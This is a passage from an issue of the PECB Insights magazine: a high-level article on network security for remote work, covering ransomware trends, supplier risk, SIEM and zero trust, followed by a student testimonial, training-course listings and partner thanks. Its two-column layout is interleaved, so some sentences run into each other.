that travel in a vast ocean of interconnected organizations,
and that sometimes the information travels from one ship
to another by small boats that leave the ship with precious
cargo. Those little boats represent the fact that now we
have adopted other ways of working with colleagues,
other ways of communication, and other technologies in
our daily lives.

74
insights.pecb.com

The precious cargo we mention is data, sometimes sensitive We are changing the way we access our information and
and critical. And as we know from the basic cybersecurity how we share it. These new ways of being interconnected to
awareness courses, humans are the weakest link in the networks and how we work, consume, and share information
chain. Networks are now extended to places outside the provides a solid base to create new conversations, that we
physical constraints of an office or a corporate network, they as security practitioners, need to address and respond to
have extended to public Wi-Fi at coffee shops, our desktop or according to our organizational priorities.
dining table while doing home office, and even sometimes
the bench on a sandy beach while nomad working. We need to ask ourselves what new risks we face and if we
are ready to provide our organization and users with the
The way we use devices now, statistics are incredible, they right strategies, policies, processes, and technologies to
show that mobile devices represent about 68% of the total secure information and assets. Therefore, Network Security
traffic on different websites globally, and desktops are is still a growing and exciting field, with new strategies to be
becoming a thing of the past. developed, and new technologies to be invented.

One of the biggest insurance companies in the world


categorizes cybersecurity incidents as the number one
risk organizations of any size, location, and sector face.
Insurance companies are aware of the risks.

This talks directly into management, cybersecurity is no


longer an IT thing, it is a transversal function and should be
addressed with a risk approach.

What about the new risks we face?


Besides the traditional strategies we already know and
do, such as perimeter defense, defense-in-depth, and
others, we need to talk about the ones that can affect our
networks as we have them today. As we mentioned before,
networks are now more than just Ethernet cables and Wi-Fi
at our offices, with a bunch of servers and network devices
connecting computers, users, and services.

Networks now can be as extended as the coffee shop’s Wi-Fi


where the C-Level executive takes the morning coffee while
checking an email or CRM, to the sandy beach in Thailand
where the developer you hired is working on your new
project. This means that our devices, no matter where they
are, have become the “last mile” of our networks.

With the “new mobility” we have achieved, cybercriminals


have found a very fertile soil to grow cybercrime and create
more advanced ways of achieving their goals.

One example is the way ransomware is expanding now,


as it has grown almost 150% in the first quarter of 2020.
Usually, it uses three main methods to spread; social
engineering, credential harvesting, and vulnerability
exploitation. Each method takes advantage of different
organizational vulnerabilities. However, the innovation
of ransomware attacks is that it has become more alike
cybercrime, as a service model manner, rather than just
one individual looking for data or crime monetization.

75
insights.pecb.com

This expands the threat horizon even more, if our devices Is it a visibility problem?
are the “last mile” of our networks, it means that they are
We have discussed a bit about cybersecurity, network
an entry point to our network and our information.
security, and threats, and this discussion led us to
Another entry point that represents high risk and that understand that network security is not only a technology
sometimes we do not see as a real threat are suppliers. problem. As engineers, we say that the more information
Supply chain attacks have been in the news more recently we have, the better decisions we make. Visibility in the
and the impact we know is that those attacks can become networks is something all cybersecurity professionals
want to achieve, yet, how can we achieve visibility in an
T H E E XPE RT

a red flag for any organization. It is true we cannot extend


our controls to our supplier’s network most of the time, but environment that changes and moves so fast? Some
we can generate policies that can help our organization to network security solutions have come to solve this kind
choose better suppliers and enforce compliance with our of problem. SIEM, for example, which stands for “Security
acceptable risk levels. Risks and threats now go beyond our Information Event Management”, is a technology that
local area network or our data centers, they go wherever together with other new technologies, such as artificial
there is a user accessing our data or services. intelligence, gives us not only visibility but also the ability
to prevent incidents before they happen. If it were only
a visibility problem, Syslog and other known logging
technologies would solve it. The problem is that we need
to have confidential information digested, and be quick to
make the right decisions.

Sometimes we are even letting technology take care


of big decisions, such as the case of using machine
learning to create anomaly behavior detection. Something
security teams and network security devices rely on a lot
these days. In the end, it is not a visibility problem but a
speed problem.

How fast can we make decisions based on the information


we have; how fast can we respond to attacks and
compromise; how resilient we are when we face attacks.

What is the right approach?


Let us talk about risks before we decide on technologies.
Many organizations burn millions of the cybersecurity
budget purchasing network security hardware and
software, sometimes without a previous strategy
or risk approach.

We do understand that some technologies that need to


be there just because they are the foundations. Firewalls,
endpoint protection, intrusion prevention and detection,
and user management are examples of network security
technologies that need to be in place before going
for more advanced solutions. Also, strategies such as
network segmentation or least privilege access have been
there for a reason.

The goal here is not to criticize the purchasing of new


technologies but to take the right approach. We need to hit
where it hurts. Where it hurts us in fact, everything we do
needs to be based on lowering the risks we face.

76
insights.pecb.com

Whether it is to deploy new technologies or to create a new Pablo Barrera


policy or process. Everything should be against threats and Cybersecurity Services Director
minimize our vulnerabilities. This way, we can say that we are for ES Consulting
doing a smart investment and not just reactive purchasing.
He has over 20 years in cybersecurity
and holds several certifications,
Is Zero Trust network security? such as CISSP, Ethical Hacking,
When we talk about network security, the new concept is ISO 27001 Senior Lead Auditor, ISO
Zero Trust. It talks about defining our users as our final 27032 Cybersecurity Manager, ISO 27035 Lead Incident
frontier. The Zero Trust security model tells us that users Manager, and others related to the field of cybersecurity.
should only have the necessary access and permissions that A certified trainer for PECB and Mile2, and a known
they require to accomplish their roles in your organization. cybersecurity speaker. He is the OWASP Chapter
This allows organizations to have more granularity on Leader for Guatemala. Currently teaches cybersecurity,
what users can and cannot do, also get more visibility and networking, and IT audit courses at two universities.
less reaction time in case of an attack. The answer is yes, Passionate about technologies and cybersecurity, he
zero trust is network security, and managers should start enjoys discovering vulnerabilities and coaching new
to dig into it. cybersecurity talents at ES.

77
My ongoing time at PECB University is leaving me with
an open mind and critical important skills, particularly
in communication and project management skills,
which I have begun to deploy to my work. My vision has
broadened to the endless opportunities available to make
a difference in a field that is important to my career.

Following the communication skills lecture this semester,


my communication skills have drastically improved and I
have developed a strategic way of going about projects;
there are fundamental concepts that my activities are
now based on that emanated from my studies at PECB
University. By the time my course will be finished, I am
sure to add value to whatever I am involved in.

PETER OKOLOH
Executive MBA in Business Continuity Management
PREPARE FOR A BETTER FUTURE
INVEST IN KNOWLEDGE!

PECB University offers a multitude of different courses in various academic programs, en


your journey to success in your chosen field.

Graduate Certificate Programs Executive MBA Pr

Graduate Certificate in Cybersecurity Executive MBA in C


Graduate Certificate in Governance, Risk, and Compliance Executive MBA in G
Graduate Certificate in Business Continuity Management Executive MBA in B
Graduate Certificate in Management Systems Administration
nlightening

rograms

Cybersecurity
Governance, Risk, and Compliance
Business Continuity Management
insights.pecb.com

ENHANCE YOUR SKILLS, FOR A


SUCCESSFUL JOURNEY
Advance with PECB’s new and updated training courses!
Contact us at [email protected] or visit our website for more.

New and updated training courses

Training Course Language Status

ISO/IEC 27005 Lead Risk Manager English Updated

ISO/IEC 27005 Risk Manager English Updated

ISO 45001 Lead Implementer English Updated

ISO 45001 Lead Auditor English Updated

ISO/IEC 27002 Lead Manager English Updated

ISO 37001 Lead Implementer English Updated

ISO 9001 Introduction English Updated

ISO 37001 Lead Implementer Spanish Updated

ISO 37001 Lead Implementer Indonesian New!

ISO/IEC 27001 Lead Implementer Italian New!

82
insights.pecb.com

83
insights.pecb.com

SPECIAL TH

TITANIUM

FRANCE

GOLD PA

e o A a
RC 658913
...promoting excellence and value

Note that PECB Partners are listed as per the credits


84
insights.pecb.com

HANKS TO

PARTNERS

ARTNERS

acquired from January 1, 2021 to December 31, 2021.

85

You might also like